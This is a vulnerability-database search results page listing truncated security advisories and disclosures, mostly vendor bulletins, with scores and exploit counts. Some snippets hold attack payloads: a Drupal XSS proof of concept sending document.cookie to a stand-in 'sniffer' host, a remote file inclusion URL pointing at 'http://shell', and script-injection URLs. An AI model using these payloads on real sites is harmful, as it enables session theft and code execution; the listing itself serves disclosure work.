Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2014/04/20 12:0 a.m.166 views

[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236062 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236062 Version: 1 HPSBMU02994 rev....

5CVSS0.5AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2011/08/05 12:0 a.m.166 views

Android Browser Cross-Application Scripting (CVE-2011-2357)

============================================================= Android Browser Cross-Application Scripting CVE-2011-2357 ============================================================= 1 Background -------------- Android applications are executed in a sandbox environment, to ensure that no applicati...

4.3CVSS5.9AI score0.04615EPSS
Exploits3
securityvulns
securityvulns
added 2011/02/22 12:0 a.m.166 views

[SECURITY] [DSA 2166-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2166-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano February 16, 2011 http://www.debian.org/security/faq -...

10CVSS4.7AI score0.02117EPSS
Exploits5
securityvulns
securityvulns
added 2009/07/03 12:0 a.m.166 views

Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service

Security Advisory --------------------------------------- Vulnerable Software: Artofdefence Hyperguard Web Application Firewall Vulnerable Version: 3 branches: prior to 3.1.1-11637; prior to 3.0.3-11636; prior to 2.5.5-11635 Apache Plug-in Homepage: http://www.artofdefence.com/ Found by: Michael...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2009/03/09 12:0 a.m.166 views

[SECURITY] CVE-2009-0781 XSS in Apache Tomcat examples web application

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2009-0781: Apache Tomcat cross-site scripting vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 6.0.0 to 6.0.18 Tomcat 5.5.0 to 5.5.27 Tomcat 4.1.0 to 4.1.39 Description: The calendar application in the...

4.3CVSS0.2AI score0.09125EPSS
Exploits1
securityvulns
securityvulns
added 2009/02/23 12:0 a.m.166 views

Drupal reflected XSS

PoC: HTML TITLEDrupal reflected XSS by etteeitdefence.ru/TITLE!-- Full HTML =on ""scriptimg = new Image; img.src = "http://sniffer/image/s.gif?"+document.cookie;/script --BODY onload="p.submit" form action="http://freelanguage.org/comment/reply/532/1263"!--target-- method="post" id="p" input...

6AI score
Exploits0
securityvulns
securityvulns
added 2007/02/22 12:0 a.m.166 views

Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak

Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable: Yes Type: Remote from local network, authentication required NULL session was not tested. Class: Information leak...

4.6CVSS6AI score0.0361EPSS
Exploits1
securityvulns
securityvulns
added 2007/01/12 12:0 a.m.166 views

[SA23669] Movable Type "nofollow" Plugin Comment Script Insertion

TITLE: Movable Type "nofollow" Plugin Comment Script Insertion SECUNIA ADVISORY ID: SA23669 VERIFY ADVISORY: http://secunia.com/advisories/23669/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Movable Type 3.x http://secunia.com/product/5753/ DESCRIPTION: A...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2006/01/29 12:0 a.m.166 views

PmWiki Multiple Vulnerabilities

This is both a PmWiki and PHP advisory, and works only with registerglobals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that by my own if just few month before! arg!. Basically in the worst scenario be are in front of two separate vulnerabilities: one regardi...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2005/05/10 12:0 a.m.166 views

Easy Message Board Directory Traversal and Remote Command

============================================================ ============================================================ Title: Easy Message Board Directory Traversal and Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 08/05/2005...

1.9AI score
Exploits0
securityvulns
securityvulns
added 2004/12/21 12:0 a.m.166 views

AIX 5.1/5.2/5.3 local root exploits

hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2004/06/23 12:0 a.m.166 views

[Full-Disclosure] [waraxe-2004-SA#033 - Multiple security holes in PhpNuke - part 1]

================================================================================ waraxe-2004-SA033 ================================================================================ Multiple security holes in PhpNuke - part 1...

7.9AI score
Exploits0
securityvulns
securityvulns
added 2002/03/25 12:0 a.m.166 views

memberlist.php of vBulletin

vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example:...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2000/08/25 12:0 a.m.166 views

DST2K0023: Directory Traversal Possible & Denial of Service in Wo rm HTTP Server

============================================================================ Delphis Consulting Plc ============================================================================ Security Team Advisories 25/08/2000 [email protected] http://www.delphisplc.com/thinking/whitepapers/...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/03/18 12:0 a.m.165 views

libmagic / file / fileinfo / PHP security vulnerabilities

Vulnerabilities in ELF parsing...

7.5CVSS3.1AI score0.05926EPSS
Exploits0References2
securityvulns
securityvulns
added 2014/10/16 12:0 a.m.165 views

[KIS-2014-08] OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability

----------------------------------------------------------------- OpenCart = 1.5.6.4 cart.php PHP Object Injection Vulnerability ----------------------------------------------------------------- - Software Link: http://www.opencart.com/ - Affected Versions: Version 1.5.6.4 and prior versions. -...

7.5CVSS0.3AI score0.06865EPSS
Exploits3
securityvulns
securityvulns
added 2014/05/04 12:0 a.m.165 views

APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3 AirPort Base Station Firmware Update 7.7.3 is now available and addresses the following: Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An...

5CVSS7.5AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2011/07/06 12:0 a.m.165 views

PHP directory traversal

Directory traversal in RFC 1867 files upload...

6.4CVSS2.9AI score0.19235EPSS
Exploits1Affected Software1
securityvulns
securityvulns
added 2010/12/21 12:0 a.m.165 views

XSS vulnerability in Habari

Vulnerability ID: HTB22731 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinhabari.html Product: Habari Vendor: Habari http://habariproject.org/en/ Vulnerable Version: 0.6.5 Vendor Notification: 02 December 2010 Vulnerability Type: XSS Cross Site Scripting Status: Fixed by Vendor Risk...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2010/11/24 12:0 a.m.165 views

[SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.4 - Not affected in default configuration. -...

4.3CVSS5.8AI score0.42009EPSS
Exploits1
securityvulns
securityvulns
added 2008/01/17 12:0 a.m.165 views

BitTorrent / uTorrent buffer overflow

Buffer overflow on peer information displaying...

2.6AI score
Exploits0References1Affected Software2
securityvulns
securityvulns
added 2007/04/25 12:0 a.m.165 views

HTMLeditbox & 2.2 >> RFI

+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2007/02/28 12:0 a.m.165 views

Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability

Admin Phorum 3.3.1.a del.php includepathFile Include Vulnerability Author: GoldM Hacker at w.Cn Mahmoodali Homepage: Www.Tryag.Cc Download S : http://www.phpforums.net/admin331.zip Other Info : http://www.phpforums.net/index.php?dir=dld v.Code : Line 3 require "$includepath/deletemessage.php";...

1AI score
Exploits0
securityvulns
securityvulns
added 2001/05/25 12:0 a.m.165 views

Elevation of privileges with debug registers on Win2K

Georgi Guninski security advisory 45, 2001 Elevation of privileges with debug registers on Win2K Systems affected: Win2K, Win2K SP1 have not tested on Win2K SP2 but according to Microsoft SP2 fixes this Risk: High Date: 24 May 2001 Legal Notice: This Advisory is Copyright c 2001 Georgi Guninski...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2000/06/15 12:0 a.m.165 views

Re: Snort 1.6 and nmap 2.54beta1

From the BUGS file distributed with Snort: ------------------------------------------------------------------------- Bug reports should be sent to [email protected] Please include the following information with your report: System Architecture Sparc, x86, etc Operating System and version Linux...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2000/05/26 12:0 a.m.165 views

Security Bulletin (MS00-036)

Microsoft Security Bulletin MS00-036 - -------------------------------------- Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities Originally posted: May 25, 2000 Summary ======= Microsoft has released a patch that eliminates two security vulnerabilities, one...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.164 views

CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability

CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Flex BlazeDS 4.7.0 Description: When receiving XML encoded AMF messages containing DTD entities, the default XML parser configurations...

5CVSS0.8AI score0.0954EPSS
Exploits2
securityvulns
securityvulns
added 2014/10/17 12:0 a.m.164 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10CVSS1.6AI score0.99974EPSS
Exploits39References27Affected Software16
securityvulns
securityvulns
added 2014/05/29 12:0 a.m.164 views

[SECURITY] CVE-2014-0075 Apache Tomcat denial of service

CVE-2014-0075 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: It was possible to craft a malformed chunk size as part of a chucked reques...

5CVSS0.6AI score0.2006EPSS
Exploits1
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.164 views

CVE-2014-1904 XSS when using Spring MVC

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-1904 XSS when using Spring MVC Severity: Moderate Vendor: Spring by Pivotal Versions Affected: - - Spring MVC 3.0.0 to 3.2.8 - - Spring MVC 4.0.0 to 4.0.1 - - Earlier unsupported versions may be affected Description: When a programmer does no...

4.3CVSS6.1AI score0.03348EPSS
Exploits0
securityvulns
securityvulns
added 2013/07/10 12:0 a.m.164 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Memory corruption, use-after-free, privilege escalation, information leakage...

10CVSS2.8AI score0.10893EPSS
Exploits6References1Affected Software3
securityvulns
securityvulns
added 2012/04/09 12:0 a.m.164 views

Multiple vulnerabilities in Open Journal Systems (OJS)

Advisory ID: HTB23079 Product: Open Journal Systems OJS Vendor: Public Knowledge Project Vulnerable Versions: 2.3.6 and probably prior Tested Version: 2.3.6 Vendor Notification: 29 February 2012 Vendor Patch: 16 March 2012 Public Disclosure: 21 March 2012 Vulnerability Type: Arbitrary File...

6.5CVSS5.9AI score0.03482EPSS
Exploits4
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.164 views

Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Canoy Softwares searchresult.php?locid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://canoysoft.in/ Persian Gulf 4 Ever! Dork : "Powered by Canoy Softwares"...

4.1AI score
Exploits0
securityvulns
securityvulns
added 2004/06/29 12:0 a.m.164 views

[UNIX] Artmedic Links File Inclusion Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2000/05/10 12:0 a.m.164 views

NetStructure 7110 console backdoor

@Stake Inc. L0pht Research Labs www.atstake.com www.L0pht.com Security Advisory Advisory Name: NetStructure 7110 console backdoor Release Date: May 8th, 2000 Application: Intel NetStructure 7110 previously the Ipivot Commerce Accelerator 1000 Severity: Box can be compromised through configuration...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/06/08 12:0 a.m.163 views

[SECURITY] [DSA 3280-1] php5 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3280-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 07, 2015 http://www.debian.org/security/faq -...

7.5CVSS2.4AI score0.50129EPSS
Exploits6
securityvulns
securityvulns
added 2011/10/31 12:0 a.m.163 views

HP Network Node Manager i information leakage

No description provided...

6.5CVSS0.8AI score0.79415EPSS
Exploits29References5Affected Software1
securityvulns
securityvulns
added 2010/11/09 12:0 a.m.163 views

ZDI-10-234: Cisco ICM Setup Manager Agent.exe HandleQueryNodeInfoReq Remote Code Execution Vulnerability

ZDI-10-234: Cisco ICM Setup Manager Agent.exe HandleQueryNodeInfoReq Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-234 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C -- Affected Vendors: Cisco -- Affected Products: Cisco...

10CVSS0.5AI score0.07995EPSS
Exploits1
securityvulns
securityvulns
added 2009/12/09 12:0 a.m.163 views

IPB v2.x up to 3.0.4 XSS vulnerability

Invision Power Board XSS vulnerability Software : Invision Power Board IPB Affected : IPB v2.x up to v3.0.4 prior versions might be vulnerable as well Remote : Yes Required : Internet Explorer +5.0 Vendor : http://www.invisionpower.com/ Download : Commercially available Author : Xacker Contact :...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2007/07/24 12:0 a.m.163 views

PR07-21: Webbler CMS forms are susceptible to spamming and phishing abuses

PR07-21: Webbler CMS forms are susceptible to spamming and phishing abuses This advisory has been published following consultation with UK CPNI formerly known as NISCC Date Found: 14th June 2007 Successfully tested on: Webbler CMS version 3.1.3. Earlier versions are possibly affected as well. Not...

Exploits0
securityvulns
securityvulns
added 2006/12/31 12:0 a.m.163 views

Sv(ADP) Forum 2.0.3 Remote Password Disclosure Vulnerablity

SvADP Forum 2.0.3 Remote Password Disclosure Vulnerablity S.name:ADP Forum Affected version:2.0.3 Download&Demo:http://www.linux.it/fedro/index.php?pag=scripts&lang=en Risk:Very Highly Critical Author:Dr Max Virus Location:Egypt POC: http:/target/path/users/admin.txt As We see Admin name and hash...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.162 views

Microsoft Windows multiple security vulnerabilities

OLE code execution, Internet Explorer multiple vulnerabilities, Schannel code execution, XML Core Services code execution, TCP/IP privilege escalation, Windows Audio Service privilege escalation, .NET Framework privilege escalation, RDP restrictions bypass, IIS restrictions bypass, IME privilege...

10CVSS3.4AI score0.95988EPSS
Exploits66References2Affected Software1
securityvulns
securityvulns
added 2010/12/17 12:0 a.m.162 views

[security bulletin] HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02660754 Version: 1 HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon ...

9CVSS0.02788EPSS
Exploits0
securityvulns
securityvulns
added 2009/10/22 12:0 a.m.162 views

US-CERT Technical Cyber Security Alert TA09-294A -- Oracle Updates for Multiple Vulnerabilities

Oracle Critical Patch Update Advisory - October 2009 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are...

10CVSS0.2AI score0.76361EPSS
Exploits17
securityvulns
securityvulns
added 2007/11/25 12:0 a.m.162 views

PBLang <= 4.99.17.q Remote File Rewriting / Remote Command Execution

--------------------------------------------------------------- / | | / | / |/ | | |/ | | / | | | | | |/ | | // | || | ||| /| / / | |||| /| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staffatinj3ct-itdotorg Original Here:...

1AI score
Exploits0
securityvulns
securityvulns
added 2007/11/22 12:0 a.m.162 views

E-vanced Solutions Multiple Vulnerabilites

E-vanced Solutions Multiple Vulnerabilites http://www.e-vancedsolutions.com First off, script code can be injected into all fields when you register for some event. This presents a possibility for cookie theft from logged in users. Next off, theres there exists an SQL injection point from the...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2007/02/11 12:0 a.m.162 views

XSS in Rainbow with Rainbow.Zen

hey ,, Vulnerable : rainbowportal web : http://rainbowportal.net/ XSS : 1- http://example.net/jira/secure/BrowseProject.jspa?id="scriptalert'BLacKZeRo'/script Discovered By BLacK ZeRo [email protected] Best regards ,,...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2002/03/26 12:0 a.m.162 views

Etnus TotalView 5.

Program: Etnus TotalView Version: 5.0.0-4 DESCRIPTION ----------- TotalView is a multiprocess source-level debugger for programs written in the C, C++, and Fortran programming languages. TotalView is part of a suite of programming tools from Etnus, LLC. PROBLEM ------- Failed to install the files...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2001/12/18 12:0 a.m.162 views

13 December 2001 Cumulative Patch for IE

---------------------------------------------------------------------- Title: 13 December 2001 Cumulative Patch for IE Date: 13 December 2001 Software: Internet Explorer Impact: Run Code of an Attacker's Choice Max Risk: Critical Bulletin: MS01-058 Microsoft encourages customers to review the...

6.8AI score
Exploits0
securityvulns
securityvulns
added 2001/03/03 12:0 a.m.162 views

def-2001-09: Winzip32 zipandemail Buffer Overflow

====================================================================== Defcom Labs Advisory def-2001-09 Winzip32 zipandemail Buffer Overflow Author: Peter Grьndl [email protected] Release Date: 2001-03-02 ======================================================================...

0.4AI score
Exploits0
Total number of security vulnerabilities5000